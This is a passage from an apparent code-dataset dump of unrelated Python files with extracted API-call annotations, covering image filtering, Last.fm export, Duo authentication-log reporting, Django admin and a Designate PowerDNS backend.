o2[in_image < (0 + brightness)] = 0
out_images[i] = [o1, o2]
plt.figure()
plt.subplot(2,len(mask_sizes)+1,1)
plt.imshow(in_image, cmap=plt.cm.gray)
plt.title('Original')
plt.subplot(2,len(mask_sizes)+1,len(mask_sizes)+2)
plt.hist(in_image.ravel(),256,[0,256])
plt.title('Histograma original')
out_images_line = []
for j in range(len(mask_sizes)):
out_image = ndimage.uniform_filter(in_image,size=mask_sizes[j])
#out_image = ndimage.correlate(in_image,kernels[j])
out_images_line.append(out_image)
plt.subplot(2, len(mask_sizes)+1, j+2)
plt.imshow(out_image, cmap=plt.cm.gray)
plt.title('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
plt.subplot(2, len(mask_sizes)+1,j+len(mask_sizes)+3)
plt.hist(out_image.ravel(),256,[0,256])
plt.title('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
out_images.append(out_images_line)
plt.show()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.figure",
"matlab_fspecial.fspecial",
"scipy.ndimage.uniform_filter",
"scipy.misc.imread"
] |
[((2556, 2566), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2564, 2566), True, 'import matplotlib.pyplot as plt\n'), ((1113, 1146), 'scipy.misc.imread', 'imread', (['(files_folder + image_name)'], {}), '(files_folder + image_name)\n', (1119, 1146), False, 'from scipy.misc import imread\n'), ((1623, 1635), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1633, 1635), True, 'import matplotlib.pyplot as plt\n'), ((1688, 1726), 'matplotlib.pyplot.imshow', 'plt.imshow', (['in_image'], {'cmap': 'plt.cm.gray'}), '(in_image, cmap=plt.cm.gray)\n', (1698, 1726), True, 'import matplotlib.pyplot as plt\n'), ((1731, 1752), 'matplotlib.pyplot.title', 'plt.title', (['"""Original"""'], {}), "('Original')\n", (1740, 1752), True, 'import matplotlib.pyplot as plt\n'), ((1860, 1892), 'matplotlib.pyplot.title', 'plt.title', (['"""Histograma original"""'], {}), "('Histograma original')\n", (1869, 1892), True, 'import matplotlib.pyplot as plt\n'), ((1315, 1345), 'matlab_fspecial.fspecial', 'fspecial', (['"""average"""', 'mask_size'], {}), "('average', mask_size)\n", (1323, 1345), False, 'from matlab_fspecial import fspecial\n'), ((1976, 2028), 'scipy.ndimage.uniform_filter', 'ndimage.uniform_filter', (['in_image'], {'size': 'mask_sizes[j]'}), '(in_image, size=mask_sizes[j])\n', (1998, 2028), True, 'import scipy.ndimage as ndimage\n'), ((2186, 2225), 'matplotlib.pyplot.imshow', 'plt.imshow', (['out_image'], {'cmap': 'plt.cm.gray'}), '(out_image, cmap=plt.cm.gray)\n', (2196, 2225), True, 'import matplotlib.pyplot as plt\n'), ((2234, 2296), 'matplotlib.pyplot.title', 'plt.title', (["('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))"], {}), "('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))\n", (2243, 2296), True, 'import matplotlib.pyplot as plt\n'), ((2424, 2501), 'matplotlib.pyplot.title', 'plt.title', (["('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))"], {}), "('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))\n", (2433, 2501), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python3
'''
Export lastFM data as JSON files and merge them into a flat pandas.DataFrame.
'''
from __future__ import annotations # [PEP 563 -- Postponed Evaluation of Annotations](https://www.python.org/dev/peps/pep-0563/)
from apiWrapper import Param, getReq
from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV
import logFormat
import datetime, enlighten, json, logging, math, time
def downloadData(param:Param, download:bool=True):
'''Download user data (if {download} is True) to json files, merge them into a flat pandas.DataFrame, and write it to disk.'''
logging.info(f"{param.filePath().name.replace('.','|')}")
if download:
subMethod = param.splitMethod(lower=True)
for f in param.filePath(glob='*json'): f.unlink()
pbarManager = enlighten.get_manager()
with pbarManager.counter(unit='page', leave=False) as pbar:
while param.page <= param.nPages:
fileName = param.filePath(ext=f'.{param.page:04d}.json')
response = getReq(param=param, pbarManager=pbarManager, collapse=False)
param.page = int(response.get(subMethod).get('@attr').get('page'))
param.nPages = int(response.get(subMethod).get('@attr').get('totalPages'))
pbar.total = param.nPages # [tqdm: update total without resetting time elapsed](https://stackoverflow.com/a/58961015/13019084)
pbar.update()
param.filePath().parent.mkdir(exist_ok=True)
with open(file=fileName, mode='w') as jsonF: json.dump(obj=response, fp=jsonF)
param.page += 1
time.sleep(param.sleep)
pbarManager.stop()
DF = loadJSON(param)
df = flattenDF(param=param, DF=DF, writeToDisk=True)
if param.splitMethod() in ['TopArtists','TopAlbums','TopTracks']: writeCSV(param=param, df=df)
def exportScrobbles():
'''Fetch and process user scrobbles for the current year and for any year where exported json files are not present.'''
def earliestScrobbleYear() -> int:
'''Determine the earliest year for the user's scrobbles.'''
lastPage = int(getReq(param=Param(method='user.getInfo')).get('playcount')) - 100 # subtract 100 plays, in case some have "unknown" scrobble dates, i.e. 1970
return getReq(param=Param(method='user.getRecentTracks', lim=1, page=lastPage)).loc[0,'date'].year
param = Param(method='user.getRecentTracks', period='overall')
currentYear = datetime.datetime.now().year
for year in range(earliestScrobbleYear(), currentYear):
paramYear = Param(method='user.getRecentTracks', period=year, fr=f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')
response = getReq(param=paramYear, collapse=False, limit=1)
numPages = math.ceil(int(response.get('recenttracks').get('@attr').get('total'))/param.lim)
if numPages != len(paramYear.filePath(glob='*json')): downloadData(paramYear, download=True)
else: downloadData(paramYear, download=False)
downloadData(Param(method='user.getRecentTracks', period=currentYear, fr=f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59'))
mergeRecentTracks(param)
def main():
# downloadData(Param(method='user.getTopTracks', period='overall'))
downloadData(Param(method='user.getTopAlbums', period='overall'))
downloadData(Param(method='user.getTopArtists', period='overall'))
exportScrobbles()
if __name__== "__main__":
main()
|
[
"json.dump",
"util.mergeRecentTracks",
"util.flattenDF",
"time.sleep",
"apiWrapper.getReq",
"enlighten.get_manager",
"apiWrapper.Param",
"util.writeCSV",
"util.loadJSON",
"datetime.datetime.now"
] |
[((1716, 1731), 'util.loadJSON', 'loadJSON', (['param'], {}), '(param)\n', (1724, 1731), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((1741, 1788), 'util.flattenDF', 'flattenDF', ([], {'param': 'param', 'DF': 'DF', 'writeToDisk': '(True)'}), '(param=param, DF=DF, writeToDisk=True)\n', (1750, 1788), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((2428, 2482), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'period': '"""overall"""'}), "(method='user.getRecentTracks', period='overall')\n", (2433, 2482), False, 'from apiWrapper import Param, getReq\n'), ((3192, 3216), 'util.mergeRecentTracks', 'mergeRecentTracks', (['param'], {}), '(param)\n', (3209, 3216), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((806, 829), 'enlighten.get_manager', 'enlighten.get_manager', ([], {}), '()\n', (827, 829), False, 'import datetime, enlighten, json, logging, math, time\n'), ((1859, 1887), 'util.writeCSV', 'writeCSV', ([], {'param': 'param', 'df': 'df'}), '(param=param, df=df)\n', (1867, 1887), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((2501, 2524), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2522, 2524), False, 'import datetime, enlighten, json, logging, math, time\n'), ((2610, 2722), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'period': 'year', 'fr': 'f"""{year}-01-01 00:00:00"""', 'to': 'f"""{year}-12-31 23:59:59"""'}), "(method='user.getRecentTracks', period=year, fr=\n f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')\n", (2615, 2722), False, 'from apiWrapper import Param, getReq\n'), ((2737, 2785), 'apiWrapper.getReq', 'getReq', ([], {'param': 'paramYear', 'collapse': '(False)', 'limit': '(1)'}), '(param=paramYear, collapse=False, limit=1)\n', (2743, 2785), False, 'from apiWrapper import Param, getReq\n'), ((3058, 3191), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'period': 'currentYear', 'fr': 'f"""{currentYear}-01-01 00:00:00"""', 'to': 'f"""{currentYear}-12-31 23:59:59"""'}), "(method='user.getRecentTracks', period=currentYear, fr=\n f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59')\n", (3063, 3191), False, 'from apiWrapper import Param, getReq\n'), ((3319, 3370), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getTopAlbums"""', 'period': '"""overall"""'}), "(method='user.getTopAlbums', period='overall')\n", (3324, 3370), False, 'from apiWrapper import Param, getReq\n'), ((3389, 3441), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getTopArtists"""', 'period': '"""overall"""'}), "(method='user.getTopArtists', period='overall')\n", (3394, 3441), False, 'from apiWrapper import Param, getReq\n'), ((1044, 1104), 'apiWrapper.getReq', 'getReq', ([], {'param': 'param', 'pbarManager': 'pbarManager', 'collapse': '(False)'}), '(param=param, pbarManager=pbarManager, collapse=False)\n', (1050, 1104), False, 'from apiWrapper import Param, getReq\n'), ((1656, 1679), 'time.sleep', 'time.sleep', (['param.sleep'], {}), '(param.sleep)\n', (1666, 1679), False, 'import datetime, enlighten, json, logging, math, time\n'), ((1574, 1607), 'json.dump', 'json.dump', ([], {'obj': 'response', 'fp': 'jsonF'}), '(obj=response, fp=jsonF)\n', (1583, 1607), False, 'import datetime, enlighten, json, logging, math, time\n'), ((2337, 2395), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'lim': '(1)', 'page': 'lastPage'}), "(method='user.getRecentTracks', lim=1, page=lastPage)\n", (2342, 2395), False, 'from apiWrapper import Param, getReq\n'), ((2179, 2207), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getInfo"""'}), "(method='user.getInfo')\n", (2184, 2207), False, 'from apiWrapper import Param, getReq\n')]
|
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import csv
import sys
import duo_client
import json
from six.moves import input
argv_iter = iter(sys.argv[1:])
def get_next_arg(prompt):
try:
return next(argv_iter)
except StopIteration:
return input(prompt)
# Configuration and information about objects to create.
admin_api = duo_client.Admin(
ikey=get_next_arg('Admin API integration key ("DI..."): '),
skey=get_next_arg("integration secret key: "),
host=get_next_arg('API hostname ("api-....duosecurity.com"): '),
)
# Retrieve log info from API:
logs = admin_api.get_authentication_log()
# Count authentications by country:
counts = dict()
for log in logs:
country = log["location"]["country"]
if country != "":
counts[country] = counts.get(country, 0) + 1
# Print CSV of country, auth count:
auths_descending = sorted(counts.items(), reverse=True)
reporter = csv.writer(sys.stdout)
print("[+] Report of auth counts by country:")
reporter.writerow(("Country", "Auth Count"))
for row in auths_descending:
reporter.writerow(
[
row[0],
row[1],
]
)
|
[
"six.moves.input",
"csv.writer"
] |
[((972, 994), 'csv.writer', 'csv.writer', (['sys.stdout'], {}), '(sys.stdout)\n', (982, 994), False, 'import csv\n'), ((320, 333), 'six.moves.input', 'input', (['prompt'], {}), '(prompt)\n', (325, 333), False, 'from six.moves import input\n')]
|
from django.contrib import admin
from .models import Post,Location
# Register your models here.
admin.site.register(Post)
admin.site.register(Location)
|
[
"django.contrib.admin.site.register"
] |
[((98, 123), 'django.contrib.admin.site.register', 'admin.site.register', (['Post'], {}), '(Post)\n', (117, 123), False, 'from django.contrib import admin\n'), ((124, 153), 'django.contrib.admin.site.register', 'admin.site.register', (['Location'], {}), '(Location)\n', (143, 153), False, 'from django.contrib import admin\n')]
|
'''
Created on 28 nov. 2021
@author: reinaqu_2
'''
import configurations
import DashboardDataExtraction as datextdash
import PublicationsQuality as pubq
from typing import TypeVar,Callable,Dict,List, Set
K = TypeVar('K')
V = TypeVar('V')
def mostrar_dict(d: Dict[str, Set[str]]):
for k,v in sorted(d.items()):
print (k, '-->', list(v))
def show_quality_bubble_plot(quality_file:str, datadash:datextdash.DashboardDataExtraction):
pub_quality = pubq.PublicationsQuality.of_excel(quality_file, configurations.config_publ)
datadash.set_publications_quality(pub_quality)
print(pub_quality.count_pairs_per_quality_measure)
datadash.create_bubble_quality()
def show_dict_from_multivalued_column(datadash:datextdash.DashboardDataExtraction, column_name: str):
d =datadash.create_dict_from_multivalued_column(column_name)
mostrar_dict(d)
|
[
"PublicationsQuality.PublicationsQuality.of_excel",
"typing.TypeVar"
] |
[((210, 222), 'typing.TypeVar', 'TypeVar', (['"""K"""'], {}), "('K')\n", (217, 222), False, 'from typing import TypeVar, Callable, Dict, List, Set\n'), ((227, 239), 'typing.TypeVar', 'TypeVar', (['"""V"""'], {}), "('V')\n", (234, 239), False, 'from typing import TypeVar, Callable, Dict, List, Set\n'), ((466, 541), 'PublicationsQuality.PublicationsQuality.of_excel', 'pubq.PublicationsQuality.of_excel', (['quality_file', 'configurations.config_publ'], {}), '(quality_file, configurations.config_publ)\n', (499, 541), True, 'import PublicationsQuality as pubq\n')]
|
from zci_bio.annotations.steps import AnnotationsStep
from common_utils.file_utils import write_fasta # copy_file, link_file
_instructions = """
Open web page http://www.herbalgenomics.org/cpgavas/
Probably one of mirrors:
Mirror 1: Central China : http://172.16.17.32:16019/analyzer/home
Mirror 2: East Coast USA : http://172.16.17.32:16019/analyzer/home (more stable)
For each sequence (fas file) do:
* Upload file: sequence.fas
* Specify project name, species name if needed, and email address for notification.
* Leave other data on default
* Submit job
* When job is finished:
- download Global multi-GenBank file into job directory ({abspath})
- run zcit command: zcit.py finish {step_name}
The paper describing CPGAVAS2 can be found here:
https://academic.oup.com/nar/advance-article/doi/10.1093/nar/gkz345/5486746
"""
def create_cpgavas_data(step_data, sequences_step):
step = AnnotationsStep(sequences_step.project, step_data, remove_data=True)
# Store sequence
for seq_ident in sequences_step.all_sequences():
seq = sequences_step.get_sequence(seq_ident)
seq = seq.replace('N', '')
# ToDo: napraviti mapiranje
write_fasta(step.step_file(seq_ident + '.fas'), [(seq_ident, seq)])
# Store instructions
with open(step.step_file('INSTRUCTIONS.txt'), 'w') as out:
out.write(_instructions.format(abspath=step.absolute_path(), step_name=step_data['step_name']))
#
step.set_sequences(sequences_step.all_sequences())
step.save(completed=False)
return step
def finish_cpgavas_data(step_obj):
prnt("ToDo: ...")
# # Check file named: GeSeqJob-<num>-<num>_GLOBAL_multi-GenBank.gbff
# for f in step_obj.step_files():
# if f.startswith('GeSeqJob') and f.endswith('_GLOBAL_multi-GenBank.gbff'):
# filename = f
# break
# else:
# print("Warning: can't find GeSeq output file!")
# return
# # Leave original file
# # ToDo: repair and filter data???
# # ToDo: inverted_region 126081..1 !!! To_ind > from_ind!!!
# copy_file(step_obj.step_file(filename), step_obj.get_all_annotation_filename())
# step_obj._check_data()
# step_obj.save()
|
[
"zci_bio.annotations.steps.AnnotationsStep"
] |
[((908, 976), 'zci_bio.annotations.steps.AnnotationsStep', 'AnnotationsStep', (['sequences_step.project', 'step_data'], {'remove_data': '(True)'}), '(sequences_step.project, step_data, remove_data=True)\n', (923, 976), False, 'from zci_bio.annotations.steps import AnnotationsStep\n')]
|
# Copyright 2012 Hewlett-Packard Development Company, L.P. All Rights Reserved.
# Copyright 2012 Managed I.T.
#
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import threading
from oslo.config import cfg
from oslo.db import options
from sqlalchemy.sql import select
from designate.openstack.common import excutils
from designate.openstack.common import log as logging
from designate.i18n import _LC
from designate import exceptions
from designate.backend import base
from designate.backend.impl_powerdns import tables
from designate.sqlalchemy import session
from designate.sqlalchemy.expressions import InsertFromSelect
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
TSIG_SUPPORTED_ALGORITHMS = ['hmac-md5']
CONF.register_group(cfg.OptGroup(
name='backend:powerdns', title="Configuration for Powerdns Backend"
))
CONF.register_opts([
cfg.StrOpt('domain-type', default='NATIVE', help='PowerDNS Domain Type'),
cfg.ListOpt('also-notify', default=[], help='List of additional IPs to '
'send NOTIFYs to'),
] + options.database_opts, group='backend:powerdns')
# Overide the default DB connection registered above, to avoid name conflicts
# between the Designate and PowerDNS databases.
CONF.set_default('connection', 'sqlite:///$state_path/powerdns.sqlite',
group='backend:powerdns')
def _map_col(keys, col):
return dict([(keys[i], col[i]) for i in range(len(keys))])
class PowerDNSBackend(base.Backend):
__plugin_name__ = 'powerdns'
def __init__(self, *args, **kwargs):
super(PowerDNSBackend, self).__init__(*args, **kwargs)
self.local_store = threading.local()
def start(self):
super(PowerDNSBackend, self).start()
@property
def session(self):
# NOTE: This uses a thread local store, allowing each greenthread to
# have it's own session stored correctly. Without this, each
# greenthread may end up using a single global session, which
# leads to bad things happening.
global LOCAL_STORE
if not hasattr(self.local_store, 'session'):
self.local_store.session = session.get_session(self.name)
return self.local_store.session
def _create(self, table, values):
query = table.insert()
resultproxy = self.session.execute(query, values)
# Refetch the row, for generated columns etc
query = select([table])\
.where(table.c.id == resultproxy.inserted_primary_key[0])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _update(self, table, values, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.update()\
.where(id_col == values[id_col.name])\
.values(**values)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# Refetch the row, for generated columns etc
query = select([table])\
.where(id_col == values[id_col.name])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _get(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = select([table])\
.where(id_col == id_)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) != 1:
raise exc_notfound()
# Map col keys to values in result
return _map_col(query.columns.keys(), results[0])
def _delete(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.delete()\
.where(id_col == id_)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# TSIG Key Methods
def create_tsigkey(self, context, tsigkey):
"""Create a TSIG Key"""
if tsigkey['algorithm'] not in TSIG_SUPPORTED_ALGORITHMS:
raise exceptions.NotImplemented('Unsupported algorithm')
values = {
'designate_id': tsigkey['id'],
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
}
self._create(tables.tsigkeys, values)
# NOTE(kiall): Prepare and execute query to install this TSIG Key on
# every domain. We use a manual query here since anything
# else would be impossibly slow.
query_select = select([
tables.domains.c.id,
"'TSIG-ALLOW-AXFR'",
"'%s'" % tsigkey['name']]
)
columns = [
tables.domain_metadata.c.domain_id,
tables.domain_metadata.c.kind,
tables.domain_metadata.c.content,
]
query = InsertFromSelect(tables.domain_metadata, query_select,
columns)
# NOTE(kiall): A TX is required for, at the least, SQLite.
self.session.begin()
self.session.execute(query)
self.session.commit()
def update_tsigkey(self, context, tsigkey):
"""Update a TSIG Key"""
values = self._get(
tables.tsigkeys,
tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
# Store a copy of the original name..
original_name = values['name']
values.update({
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
})
self._update(tables.tsigkeys, values,
id_col=tables.tsigkeys.c.designate_id,
exc_notfound=exceptions.TsigKeyNotFound)
# If the name changed, Update the necessary DomainMetadata records
if original_name != tsigkey['name']:
query = tables.domain_metadata.update()\
.where(tables.domain_metadata.c.kind == 'TSIG_ALLOW_AXFR')\
.where(tables.domain_metadata.c.content == original_name)
query.values(content=tsigkey['name'])
self.session.execute(query)
def delete_tsigkey(self, context, tsigkey):
"""Delete a TSIG Key"""
try:
# Delete this TSIG Key itself
self._delete(
tables.tsigkeys, tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
except exceptions.TsigKeyNotFound:
# If the TSIG Key is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a TSIG key which is '
'not present in the backend. ID: %s') %
tsigkey['id'])
return
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
.where(tables.domain_metadata.c.content == tsigkey['name'])
self.session.execute(query)
# Domain Methods
def create_domain(self, context, domain):
try:
self.session.begin()
servers = self.central_service.find_servers(self.admin_context)
domain_values = {
'designate_id': domain['id'],
'name': domain['name'].rstrip('.'),
'master': servers[0]['name'].rstrip('.'),
'type': CONF['backend:powerdns'].domain_type,
'account': context.tenant
}
domain_ref = self._create(tables.domains, domain_values)
# Install all TSIG Keys on this domain
query = select([tables.tsigkeys.c.name])
resultproxy = self.session.execute(query)
values = [i for i in resultproxy.fetchall()]
self._update_domainmetadata(domain_ref['id'], 'TSIG-ALLOW-AXFR',
values)
# Install all Also Notify's on this domain
self._update_domainmetadata(domain_ref['id'], 'ALSO-NOTIFY',
CONF['backend:powerdns'].also_notify)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_domain(self, context, domain):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
try:
self.session.begin()
# Update the Records TTLs where necessary
query = tables.records.update()\
.where(tables.records.c.domain_id == domain_ref['id'])
query = query.where(tables.records.c.inherit_ttl == True) # noqa\
query = query.values(ttl=domain['ttl'])
self.session.execute(query)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_domain(self, context, domain):
try:
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
except exceptions.DomainNotFound:
# If the Domain is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a domain which is '
'not present in the backend. ID: %s') %
domain['id'])
return
self._delete(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
# Ensure the records are deleted
query = tables.records.delete()\
.where(tables.records.c.domain_id == domain_ref['id'])
self.session.execute(query)
# Ensure domainmetadata is deleted
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.domain_id == domain_ref['id'])
self.session.execute(query)
# RecordSet Methods
def create_recordset(self, context, domain, recordset):
try:
self.session.begin(subtransactions=True)
# Create all the records..
for record in recordset.records:
self.create_record(context, domain, recordset, record)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_recordset(self, context, domain, recordset):
# TODO(kiall): This is a total kludge. Intended as the simplest
# possible fix for the issue. This needs to be
# re-implemented correctly.
try:
self.session.begin(subtransactions=True)
self.delete_recordset(context, domain, recordset)
self.create_recordset(context, domain, recordset)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_recordset(self, context, domain, recordset):
# Ensure records are deleted
query = tables.records.delete()\
.where(tables.records.c.designate_recordset_id == recordset['id'])
self.session.execute(query)
# Record Methods
def create_record(self, context, domain, recordset, record):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_values = {
'designate_id': record['id'],
'designate_recordset_id': record['recordset_id'],
'domain_id': domain_ref['id'],
'name': recordset['name'].rstrip('.'),
'type': recordset['type'],
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
}
self._create(tables.records, record_values)
def update_record(self, context, domain, recordset, record):
record_ref = self._get_record(record['id'])
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_ref.update({
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
})
self._update(tables.records, record_ref,
exc_notfound=exceptions.RecordNotFound)
def delete_record(self, context, domain, recordset, record):
try:
record_ref = self._get(tables.records, record['id'],
exceptions.RecordNotFound,
id_col=tables.records.c.designate_id)
except exceptions.RecordNotFound:
# If the Record is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a record which is '
'not present in the backend. ID: %s') %
record['id'])
else:
self._delete(tables.records, record_ref['id'],
exceptions.RecordNotFound)
# Internal Methods
def _update_domainmetadata(self, domain_id, kind, values=None,
delete=True):
"""Updates a domain's metadata with new values"""
# Fetch all current metadata of the specified kind
values = values or []
query = select([tables.domain_metadata.c.content])\
.where(tables.domain_metadata.c.domain_id == domain_id)\
.where(tables.domain_metadata.c.kind == kind)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
for metadata_id, content in results:
if content not in values:
if delete:
LOG.debug('Deleting stale domain metadata: %r' %
([domain_id, kind, content],))
# Delete no longer necessary values
# We should never get a notfound here, so UnknownFailure is
# a reasonable choice.
self._delete(tables.domain_metadata, metadata_id,
exceptions.UnknownFailure)
else:
# Remove pre-existing values from the list of values to insert
values.remove(content)
# Insert new values
for value in values:
LOG.debug('Inserting new domain metadata: %r' %
([domain_id, kind, value],))
self._create(
tables.domain_metadata,
{
"domain_id": domain_id,
"kind": kind,
"content": value
})
def _is_authoritative(self, domain, recordset, record):
# NOTE(kiall): See http://doc.powerdns.com/dnssec-modes.html
if recordset['type'] == 'NS' and recordset['name'] != domain['name']:
return False
else:
return True
def _sanitize_content(self, type, content):
if type in ('CNAME', 'MX', 'SRV', 'NS', 'PTR'):
return content.rstrip('.')
if type in ('TXT', 'SPF'):
return '"%s"' % content.replace('"', '\\"')
return content
def _get_record(self, record_id=None, domain=None, type_=None):
query = select([tables.records])
if record_id:
query = query.where(tables.records.c.designate_id == record_id)
if type_:
query = query.where(tables.records.c.type == type_)
if domain:
query = query.where(tables.records.c.domain_id == domain['id'])
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) < 1:
raise exceptions.RecordNotFound('No record found')
elif len(results) > 1:
raise exceptions.RecordNotFound('Too many records found')
else:
return _map_col(query.columns.keys(), results[0])
|
[
"designate.backend.impl_powerdns.tables.domain_metadata.delete",
"designate.sqlalchemy.expressions.InsertFromSelect",
"designate.openstack.common.excutils.save_and_reraise_exception",
"designate.exceptions.RecordNotFound",
"designate.exceptions.NotImplemented",
"oslo.config.cfg.OptGroup",
"designate.backend.impl_powerdns.tables.records.update",
"designate.i18n._LC",
"threading.local",
"oslo.config.cfg.ListOpt",
"designate.backend.impl_powerdns.tables.records.delete",
"base64.b64encode",
"designate.sqlalchemy.session.get_session",
"designate.backend.impl_powerdns.tables.domain_metadata.update",
"designate.openstack.common.log.getLogger",
"sqlalchemy.sql.select",
"oslo.config.cfg.StrOpt"
] |
[((1199, 1226), 'designate.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1216, 1226), True, 'from designate.openstack.common import log as logging\n'), ((1305, 1391), 'oslo.config.cfg.OptGroup', 'cfg.OptGroup', ([], {'name': '"""backend:powerdns"""', 'title': '"""Configuration for Powerdns Backend"""'}), "(name='backend:powerdns', title=\n 'Configuration for Powerdns Backend')\n", (1317, 1391), False, 'from oslo.config import cfg\n'), ((2229, 2246), 'threading.local', 'threading.local', ([], {}), '()\n', (2244, 2246), False, 'import threading\n'), ((5340, 5416), 'sqlalchemy.sql.select', 'select', (['[tables.domains.c.id, "\'TSIG-ALLOW-AXFR\'", "\'%s\'" % tsigkey[\'name\']]'], {}), '([tables.domains.c.id, "\'TSIG-ALLOW-AXFR\'", "\'%s\'" % tsigkey[\'name\']])\n', (5346, 5416), False, 'from sqlalchemy.sql import select\n'), ((5648, 5711), 'designate.sqlalchemy.expressions.InsertFromSelect', 'InsertFromSelect', (['tables.domain_metadata', 'query_select', 'columns'], {}), '(tables.domain_metadata, query_select, columns)\n', (5664, 5711), False, 'from designate.sqlalchemy.expressions import InsertFromSelect\n'), ((17162, 17186), 'sqlalchemy.sql.select', 'select', (['[tables.records]'], {}), '([tables.records])\n', (17168, 17186), False, 'from sqlalchemy.sql import select\n'), ((1420, 1492), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (['"""domain-type"""'], {'default': '"""NATIVE"""', 'help': '"""PowerDNS Domain Type"""'}), "('domain-type', default='NATIVE', help='PowerDNS Domain Type')\n", (1430, 1492), False, 'from oslo.config import cfg\n'), ((1498, 1591), 'oslo.config.cfg.ListOpt', 'cfg.ListOpt', (['"""also-notify"""'], {'default': '[]', 'help': '"""List of additional IPs to send NOTIFYs to"""'}), "('also-notify', default=[], help=\n 'List of additional IPs to send NOTIFYs to')\n", (1509, 1591), False, 'from oslo.config import cfg\n'), ((2747, 2777), 'designate.sqlalchemy.session.get_session', 'session.get_session', (['self.name'], {}), '(self.name)\n', (2766, 2777), False, 'from designate.sqlalchemy import session\n'), ((4793, 4843), 'designate.exceptions.NotImplemented', 'exceptions.NotImplemented', (['"""Unsupported algorithm"""'], {}), "('Unsupported algorithm')\n", (4818, 4843), False, 'from designate import 